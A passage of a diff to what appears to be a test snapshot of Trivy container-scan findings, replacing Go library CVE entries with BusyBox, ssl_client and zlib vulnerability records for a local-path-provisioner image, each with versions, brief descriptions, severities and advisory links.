"https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-3076.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ISRZZ6NY5R2TBYE72KZFOCO25TEUQTBF/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-31525", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42382", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0236", + "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202208-02", + "value": "https://ubuntu.com/security/notices/USN-5179-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-31525", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-42382", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.4.0", - "foundIn": "Target: 'usr/local/bin/local-path-provisioner' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-41717", - "installedVersion": "v0.0.0-20201021035429-f5854403a974", - "packageName": "golang.org/x/net", + "fixedVersion": "1.31.1-r21", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-42383", + "installedVersion": "1.31.1-r16", + "packageName": "ssl_client", "references": [ - "https://access.redhat.com/errata/RHSA-2023:2367", - "https://access.redhat.com/security/cve/CVE-2022-41717", - "https://bugzilla.redhat.com/2092793", - "https://bugzilla.redhat.com/2161274", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", - "https://errata.almalinux.org/9/ALSA-2023-2367.html", - "https://github.com/advisories/GHSA-xrjj-mj9h-534m", - "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", - "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", - "https://go.dev/cl/455635", - "https://go.dev/cl/455717", - "https://go.dev/issue/56350", - "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", - "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", - "https://linux.oracle.com/cve/CVE-2022-41717.html", - "https://linux.oracle.com/errata/ELSA-2023-2866.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", - "https://pkg.go.dev/vuln/GO-2022-1144", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-41717", + "https://access.redhat.com/security/cve/CVE-2021-42383", + "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-42383", + "https://security.netapp.com/advisory/ntap-20211223-0002/", + "https://www.cve.org/CVERecord?id=CVE-2021-42383", ], }, "category": "Vulnerability", - "description": "An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests. HTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.", + "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the evaluate function", "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "excessive memory growth in a Go server accepting HTTP/2 requests", + "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the evaluate()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-41717", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2367", + "value": "https://avd.aquasec.com/nvd/cve-2021-42383", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-41717", + "value": "https://access.redhat.com/security/cve/CVE-2021-42383", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2092793", + "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2161274", + "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2367.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-xrjj-mj9h-534m", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42383", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", + "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-42383", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "1.31.1-r21", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-42384", + "installedVersion": "1.31.1-r16", + "packageName": "ssl_client", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-42384", + "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42384", + "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-42384", + "https://security.netapp.com/advisory/ntap-20211223-0002/", + "https://ubuntu.com/security/notices/USN-5179-1", + "https://www.cve.org/CVERecord?id=CVE-2021-42384", + ], + }, + "category": "Vulnerability", + "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the handle_special function", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the handle_special()", + "references": [ { "type": "URL", - "value": "https://go.dev/cl/455635", + "value": "https://avd.aquasec.com/nvd/cve-2021-42384", }, { "type": "URL", - "value": "https://go.dev/cl/455717", + "value": "https://access.redhat.com/security/cve/CVE-2021-42384", }, { "type": "URL", - "value": "https://go.dev/issue/56350", + "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42384", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", + "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-41717.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2866.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42384", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-1144", + "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://ubuntu.com/security/notices/USN-5179-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-41717", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-42384", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.0.0-20220412211240-33da011f77ad", - "foundIn": "Target: 'usr/local/bin/local-path-provisioner' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-29526", - "installedVersion": "v0.0.0-20200930185726-fdedc70b468f", - "packageName": "golang.org/x/sys", + "fixedVersion": "1.31.1-r21", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-42385", + "installedVersion": "1.31.1-r16", + "packageName": "ssl_client", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-29526", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", - "https://github.com/advisories/GHSA-p782-xgp4-8hr8", - "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", - "https://github.com/golang/go/issues/52313", - "https://go.dev/cl/399539", - "https://go.dev/cl/400074", - "https://go.dev/issue/52313", - "https://groups.google.com/g/golang-announce", - "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", - "https://linux.oracle.com/cve/CVE-2022-29526.html", - "https://linux.oracle.com/errata/ELSA-2022-5337.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", - "https://pkg.go.dev/vuln/GO-2022-0493", - "https://security.gentoo.org/glsa/202208-02", - "https://security.netapp.com/advisory/ntap-20220729-0001/", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-29526", + "https://access.redhat.com/security/cve/CVE-2021-42385", + "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42385", + "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-42385", + "https://security.netapp.com/advisory/ntap-20211223-0002/", + "https://ubuntu.com/security/notices/USN-5179-1", + "https://www.cve.org/CVERecord?id=CVE-2021-42385", ], }, "category": "Vulnerability", - "description": "Go before 1.17.10 and 1.18.x before 1.18.2 has Incorrect Privilege Assignment. When called with a non-zero flags parameter, the Faccessat function could incorrectly report that a file is accessible.", + "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the evaluate function", "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "faccessat checks wrong group", + "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the evaluate()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-29526", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-29526", + "value": "https://avd.aquasec.com/nvd/cve-2021-42385", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", + "value": "https://access.redhat.com/security/cve/CVE-2021-42385", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-p782-xgp4-8hr8", + "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42385", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/52313", + "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", }, { "type": "URL", - "value": "https://go.dev/cl/399539", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", }, { "type": "URL", - "value": "https://go.dev/cl/400074", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", }, { "type": "URL", - "value": "https://go.dev/issue/52313", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42385", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", + "value": "https://ubuntu.com/security/notices/USN-5179-1", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-29526.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-42385", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "1.31.1-r21", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-42386", + "installedVersion": "1.31.1-r16", + "packageName": "ssl_client", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-42386", + "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42386", + "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-42386", + "https://security.netapp.com/advisory/ntap-20211223-0002/", + "https://ubuntu.com/security/notices/USN-5179-1", + "https://www.cve.org/CVERecord?id=CVE-2021-42386", + ], + }, + "category": "Vulnerability", + "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the nvalloc function", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the nvalloc()", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-5337.html", + "value": "https://avd.aquasec.com/nvd/cve-2021-42386", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", + "value": "https://access.redhat.com/security/cve/CVE-2021-42386", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42386", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0493", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202208-02", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42386", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220729-0001/", + "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://ubuntu.com/security/notices/USN-5179-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-29526", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-42386", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.3.7", - "foundIn": "Target: 'usr/local/bin/local-path-provisioner' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2021-38561", - "installedVersion": "v0.3.3", - "packageName": "golang.org/x/text", + "fixedVersion": "1.31.1-r22", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2022-28391", + "installedVersion": "1.31.1-r16", + "packageName": "ssl_client", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-38561", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38561", - "https://deps.dev/advisory/OSV/GO-2021-0113", - "https://github.com/advisories/GHSA-ppp9-7jff-5vj2", - "https://go.dev/cl/340830", - "https://go.googlesource.com/text/+/383b2e75a7a4198c42f8f87833eefb772868a56f", - "https://groups.google.com/g/golang-announce", - "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", - "https://pkg.go.dev/golang.org/x/text/language", - "https://pkg.go.dev/vuln/GO-2021-0113", - "https://ubuntu.com/security/notices/USN-5873-1", - "https://www.cve.org/CVERecord?id=CVE-2021-38561", + "https://access.redhat.com/security/cve/CVE-2022-28391", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28391", + "https://git.alpinelinux.org/aports/plain/main/busybox/0001-libbb-sockaddr2str-ensure-only-printable-characters-.patch", + "https://git.alpinelinux.org/aports/plain/main/busybox/0002-nslookup-sanitize-all-printed-strings-with-printable.patch", + "https://gitlab.alpinelinux.org/alpine/aports/-/issues/13661", + "https://nvd.nist.gov/vuln/detail/CVE-2022-28391", + "https://www.cve.org/CVERecord?id=CVE-2022-28391", ], }, "category": "Vulnerability", - "description": "golang.org/x/text/language in golang.org/x/text before 0.3.7 can panic with an out-of-bounds read during BCP 47 language tag parsing. Index calculation is mishandled. If parsing untrusted user input, this can be used as a vector for a denial-of-service attack.", + "description": "BusyBox through 1.35.0 allows remote attackers to execute arbitrary code if netstat is used to print a DNS PTR record's value to a VT compatible terminal. Alternatively, the attacker could choose to change the terminal's colors.", "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "out-of-bounds read in golang.org/x/text/language leads to DoS", + "name": "busybox: remote attackers may execute arbitrary code if netstat is used", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-38561", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-38561", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38561", - }, - { - "type": "URL", - "value": "https://deps.dev/advisory/OSV/GO-2021-0113", - }, - { - "type": "URL", - "value": "https://github.com/advisories/GHSA-ppp9-7jff-5vj2", - }, - { - "type": "URL", - "value": "https://go.dev/cl/340830", + "value": "https://avd.aquasec.com/nvd/cve-2022-28391", }, { "type": "URL", - "value": "https://go.googlesource.com/text/+/383b2e75a7a4198c42f8f87833eefb772868a56f", + "value": "https://access.redhat.com/security/cve/CVE-2022-28391", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28391", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", + "value": "https://git.alpinelinux.org/aports/plain/main/busybox/0001-libbb-sockaddr2str-ensure-only-printable-characters-.patch", }, { "type": "URL", - "value": "https://pkg.go.dev/golang.org/x/text/language", + "value": "https://git.alpinelinux.org/aports/plain/main/busybox/0002-nslookup-sanitize-all-printed-strings-with-printable.patch", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2021-0113", + "value": "https://gitlab.alpinelinux.org/alpine/aports/-/issues/13661", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5873-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-28391", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-38561", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-28391", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.3.8", - "foundIn": "Target: 'usr/local/bin/local-path-provisioner' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-32149", - "installedVersion": "v0.3.3", - "packageName": "golang.org/x/text", + "fixedVersion": "1.31.1-r21", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-42374", + "installedVersion": "1.31.1-r16", + "packageName": "ssl_client", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-32149", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", - "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", - "https://github.com/golang/go/issues/56152", - "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", - "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", - "https://go.dev/cl/442235", - "https://go.dev/issue/56152", - "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", - "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", - "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", - "https://pkg.go.dev/vuln/GO-2022-1059", - "https://ubuntu.com/security/notices/USN-5873-1", - "https://www.cve.org/CVERecord?id=CVE-2022-32149", + "https://access.redhat.com/security/cve/CVE-2021-42374", + "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42374", + "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-42374", + "https://security.netapp.com/advisory/ntap-20211223-0002/", + "https://ubuntu.com/security/notices/USN-5179-1", + "https://www.cve.org/CVERecord?id=CVE-2021-42374", ], }, "category": "Vulnerability", - "description": "An attacker may cause a denial of service by crafting an Accept-Language header which ParseAcceptLanguage will take significant time to parse.", + "description": "An out-of-bounds heap read in Busybox's unlzma applet leads to information leak and denial of service when crafted LZMA-compressed input is decompressed. This can be triggered by any applet/format that", "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "ParseAcceptLanguage takes a long time to parse complex tags", + "name": "busybox: out-of-bounds read in unlzma applet leads to information leak and denial of service when crafted LZMA-compressed input is decompressed", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-32149", + "value": "https://avd.aquasec.com/nvd/cve-2021-42374", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-32149", + "value": "https://access.redhat.com/security/cve/CVE-2021-42374", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", + "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42374", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/56152", + "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", }, { "type": "URL", - "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", }, { "type": "URL", - "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", }, { "type": "URL", - "value": "https://go.dev/cl/442235", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42374", }, { "type": "URL", - "value": "https://go.dev/issue/56152", + "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", + "value": "https://ubuntu.com/security/notices/USN-5179-1", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-42374", + }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "1.2.12-r2", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2022-37434", + "installedVersion": "1.2.11-r3", + "packageName": "zlib", + "references": [ + "http://seclists.org/fulldisclosure/2022/Oct/37", + "http://seclists.org/fulldisclosure/2022/Oct/38", + "http://seclists.org/fulldisclosure/2022/Oct/41", + "http://seclists.org/fulldisclosure/2022/Oct/42", + "http://www.openwall.com/lists/oss-security/2022/08/05/2", + "http://www.openwall.com/lists/oss-security/2022/08/09/1", + "https://access.redhat.com/errata/RHSA-2022:8291", + "https://access.redhat.com/security/cve/CVE-2022-37434", + "https://bugzilla.redhat.com/2116639", + "https://bugzilla.redhat.com/show_bug.cgi?id=2053198", + "https://bugzilla.redhat.com/show_bug.cgi?id=2077431", + "https://bugzilla.redhat.com/show_bug.cgi?id=2081296", + "https://bugzilla.redhat.com/show_bug.cgi?id=2116639", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37434", + "https://errata.almalinux.org/9/ALSA-2022-8291.html", + "https://errata.rockylinux.org/RLSA-2022:8291", + "https://github.com/curl/curl/issues/9271", + "https://github.com/ivd38/zlib_overflow", + "https://github.com/madler/zlib/blob/21767c654d31d2dccdde4330529775c6c5fd5389/zlib.h#L1062-L1063", + "https://github.com/madler/zlib/commit/eff308af425b67093bab25f80f1ae950166bece1", + "https://github.com/nodejs/node/blob/75b68c6e4db515f76df73af476eccf382bbcb00a/deps/zlib/inflate.c#L762-L764", + "https://linux.oracle.com/cve/CVE-2022-37434.html", + "https://linux.oracle.com/errata/ELSA-2023-1095.html", + "https://lists.debian.org/debian-lts-announce/2022/09/msg00012.html", + "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JWN4VE3JQR4O2SOUS5TXNLANRPMHWV4I/", + 